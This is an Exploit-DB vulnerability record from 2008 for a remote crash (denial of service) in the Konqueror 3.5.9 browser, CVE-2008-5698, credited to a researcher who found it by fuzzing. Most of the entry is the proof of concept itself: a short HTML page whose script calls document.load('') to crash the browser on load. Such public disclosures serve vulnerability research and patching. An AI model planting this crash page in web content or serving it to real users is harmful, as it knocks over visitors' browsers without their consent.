Konqueror 3.5.9 load Remote Crash Vulnerability

2008-10-10T00:00:00
ID EDB-ID:6718
Type exploitdb
Reporter Jeremy Brown
Modified 2008-10-10T00:00:00

Description

Konqueror 3.5.9 (load) Remote Crash Vulnerability. CVE-2008-5698. Dos exploit for linux platform

                                        
                                            <!--- Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]
      Tested on Ubuntu 8.04 + Konqueror 3.5.9
      A product of my fuzzing projects :)                           -->
<html>
<script type="text/javascript">
document.load('');
</script>
</html>

# milw0rm.com [2008-10-10]